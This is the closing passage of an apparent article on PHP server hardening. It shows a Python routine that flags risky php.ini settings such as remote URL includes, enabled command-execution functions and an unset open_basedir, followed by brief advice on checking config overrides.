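    if php_bool(settings.get("allow_url_fopen")):
        findings.append(("allow_url_fopen", "enabled: file functions can fetch remote HTTP/FTP resources"))
    if php_bool(settings.get("allow_url_include")):
        findings.append(("allow_url_include", "enabled: include/require can load remote code"))
    disabled = {f.strip() for f in settings.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(SHELL_FUNCTIONS - disabled)
    if missing:
        findings.append(("disable_functions", "command execution functions still enabled: " + ", ".join(missing)))
    if not settings.get("open_basedir"):
        findings.append(("open_basedir", "unset: PHP may read and write anywhere the web user can"))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"[{label}]")
        for directive, message in audit(parse_php_ini(ini)) or [("-", "no findings")]:
            print(f"  {directive}: {message}")
```

Run it against the output of `php --ini` (the loaded php.ini plus any conf.d overrides) rather than against a single file, since a later override can re-enable what the main file disables.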

 

Acting on the options flagged in the PHP security audit report, adopting an automated malware detection tool and reviewing the points above establishes an adequate security level for your web servers and platforms.

A. Bechtsoudis
